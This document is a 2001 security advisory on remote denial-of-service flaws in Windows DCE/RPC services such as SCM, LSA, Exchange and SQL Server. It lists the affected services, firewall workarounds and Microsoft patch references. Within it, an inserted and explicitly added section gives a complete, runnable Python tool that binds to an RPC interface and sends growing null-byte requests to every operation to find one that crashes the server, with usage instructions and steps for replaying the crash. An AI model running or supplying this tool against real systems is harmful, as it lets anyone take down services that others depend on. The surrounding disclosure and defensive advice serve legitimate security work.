Multiple Remote DoS vulnerabilities in DCE/RPC daemons

Issue Date: July 30, 2001
Contact: Todd Sabin

Topic:
Many DCE/RPC servers are vulnerable to remote DoS attacks.

Overview:
Many DCE/RPC servers do not validate request parameters properly and can be crashed by sending an improperly formatted request.

Affected Systems:
At least the following services are known to be affected. More servers are likely to be vulnerable. For a complete list of what Microsoft has patched, see the Microsoft security bulletin in the References section below.

  W2K SCM (services.exe)
  NT4 SCM (services.exe)
  NT4 LSA (lsass.exe)
  NT4 Endpoint mapper (Rpcss.exe)
  W2K Endpoint mapper (svchost.exe; fixed by MS00-066)
  SQL Server 7 (sqlservr.exe)
  W2K DHCP Server
  W2K IIS Server (inetinfo.exe)
  Exchange 5.5 SP3 (STORE.exe)
  Exchange 5.5 SP3 (MAD.exe)
  NT4 Spooler (spoolss.exe)
  W2K License Srv (llssrv.exe)
  NT4 License Srv (llssrv.exe)

Impact:
An unauthenticated remote attacker who can talk to the endpoint on which the server is listening can crash the server. In some cases the server either restarts itself or is restarted by the OS.

Details:
By sending successively larger requests containing nothing but nulls to every operation on every interface supported by a DCE/RPC server, it is often possible to find a particular request that crashes the server.

Note that it is not necessary to run through every possible request to crash a given server. Each server has a particular request (or requests) which crashes it. Once that request has been found by grinding through all the possibilities, only that request is needed to crash the server.

The exact endpoints on which a server listens vary from service to service. Many listen on named pipes, which are reachable over SMB on TCP port 139 or (on W2K) 445. Other services, e.g. Exchange, typically listen on both TCP and UDP ports above 1024. Services that do not listen on named pipes can usually be enumerated via the endpoint mapper (TCP/UDP port 135) using rpcdump.
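The null-stub search described above, as an added example that is not part of the original advisory or of RAZOR's rpctools: a minimal DCE/RPC (C706) client over ncacn_ip_tcp that binds to an interface and then sends one request per opnum with an ever-larger run of zero bytes as stub data. Assumptions of the example: the well-known NDR 2.0 transfer syntax, the well-known endpoint mapper interface UUID/version as the demo target (any other interface works the same way), a fixed 4280-byte fragment size offered in the bind so that the stubs stay within one fragment (larger stubs would need fragmentation, which the example does not implement), and a probe driver, host, port and opnum range that are the example's own choices rather than anything the advisory specifies.

```python
"""Minimal DCE/RPC client over ncacn_ip_tcp for the null-stub crash search:
bind to an interface, then send requests whose stub data is an ever-larger
run of nulls to each opnum. Added example, not the advisory's own tooling."""
import socket
import struct
import uuid

# Well-known NDR 2.0 transfer syntax and, as the demo target, the endpoint
# mapper interface (v3.0). Any other interface UUID/version works the same way.
NDR_SYNTAX = (uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860"), 2, 0)
EPM_INTERFACE = (uuid.UUID("e1af8308-5d1f-11c9-91a4-08002b14a0fa"), 3, 0)

PTYPE_REQUEST, PTYPE_FAULT, PTYPE_BIND, PTYPE_BIND_ACK = 0, 3, 11, 12
PFC_FIRST_FRAG, PFC_LAST_FRAG = 0x01, 0x02
MAX_FRAG = 4280                          # assumed fragment size offered in the bind
LE_DREP = b"\x10\x00\x00\x00"            # little-endian ints, ASCII chars, IEEE floats
# Common 16-byte header: vers, vers_minor, ptype, flags, drep, frag_len, auth_len, call_id
HDR = struct.Struct("<BBBB4sHHI")


def syntax_id(u, major, minor):
    """p_syntax_id_t: UUID in DCE wire order (mixed-endian) plus 16-bit major/minor."""
    return u.bytes_le + struct.pack("<HH", major, minor)


def pdu(ptype, body, call_id, flags=PFC_FIRST_FRAG | PFC_LAST_FRAG):
    """Prepend the common header; frag_length counts header and body together."""
    return HDR.pack(5, 0, ptype, flags, LE_DREP, HDR.size + len(body), 0, call_id) + body


def build_bind(interface=EPM_INTERFACE, call_id=1):
    """Bind PDU offering one presentation context (ctx id 0) with NDR 2.0."""
    body = struct.pack("<HHI", MAX_FRAG, MAX_FRAG, 0)   # max xmit/recv frag, assoc group
    body += struct.pack("<BBH", 1, 0, 0)                # n_context_elem = 1, padding
    body += struct.pack("<HBB", 0, 1, 0)                # ctx id 0, one transfer syntax
    body += syntax_id(*interface) + syntax_id(*NDR_SYNTAX)
    return pdu(PTYPE_BIND, body, call_id)


def build_request(opnum, stub, ctx_id=0, call_id=2):
    """Request PDU: alloc_hint, context id, opnum, then the raw stub bytes."""
    if len(stub) + HDR.size + 8 > MAX_FRAG:
        raise ValueError("stub needs fragmentation, which this example does not do")
    return pdu(PTYPE_REQUEST, struct.pack("<IHH", len(stub), ctx_id, opnum) + stub, call_id)


def parse_header(data):
    """(ptype, frag_length, call_id) of a received PDU, or None if it is too short."""
    if len(data) < HDR.size:
        return None
    _, _, ptype, _, _, frag_len, _, call_id = HDR.unpack_from(data)
    return ptype, frag_len, call_id


def null_stub_cases(opnums, max_len=4096, step=32):
    """The advisory's grind: for each opnum, stubs of 0, step, 2*step, ... nulls.
    Yields (opnum, stub_len, request_pdu) with a fresh call_id per request."""
    call_id = 2
    for opnum in opnums:
        for n in range(0, max_len + 1, step):
            yield opnum, n, build_request(opnum, b"\x00" * n, call_id=call_id)
            call_id += 1


def probe(host, port, opnums, timeout=3.0, interface=EPM_INTERFACE):
    """Send bind + one request per case, on a fresh connection each time.
    Returns (reason, opnum, stub_len) for the first case after which the server
    stops talking, i.e. the crash candidate, or None if every case was answered.
    A timeout can also mean a hung server; re-run that single case to confirm."""
    for opnum, n, req in null_stub_cases(opnums):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.sendall(build_bind(interface))
                ack = parse_header(s.recv(MAX_FRAG))
                if ack is None or ack[0] != PTYPE_BIND_ACK:
                    return ("bind-rejected", opnum, n)
                s.sendall(req)
                if not s.recv(MAX_FRAG):          # EOF: the server closed on us
                    return ("closed", opnum, n)
        except (socket.timeout, OSError):
            return ("unreachable-or-hung", opnum, n)
    return None


if __name__ == "__main__":
    import sys
    # usage: python null_rpc_fuzz.py <host> <port> <max_opnum>   (lab use only)
    host, port, max_op = sys.argv[1], int(sys.argv[2]), int(sys.argv[3])
    print(probe(host, port, range(max_op + 1)))
```

Once probe() reports a candidate, replay only that (opnum, stub length) pair after the service has come back; a single request that reliably kills the server is the result the advisory describes. Named-pipe endpoints need the same PDUs carried over SMB instead of a raw TCP socket.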
The rpcdump tool ships with the NT resource kit. A free version is also available on the RAZOR web site in the rpctools package.

If COM Internet Services has been installed and enabled, these attacks may also be possible over TCP port 80 (RPC over HTTP). This is not a default configuration, however.

Workarounds:
Firewall off as much as possible: at a minimum, block TCP 139 and 445 (named pipes over SMB), TCP/UDP 135 (the endpoint mapper) and the dynamically assigned high ports used by services such as Exchange from untrusted networks.

Recommendations:
Install the appropriate patches from Microsoft. Do not install COM Internet Services.

___________________________________________________________________

References:
  Microsoft security bulletin MS01-041:
    http://www.microsoft.com/technet/security/bulletin/MS01-041.asp
  Microsoft patches: the patches vary depending upon the service; see the security bulletin for details.
  Microsoft Knowledge Base article Q298012:
    http://support.microsoft.com/support/kb/articles/Q298/0/12.ASP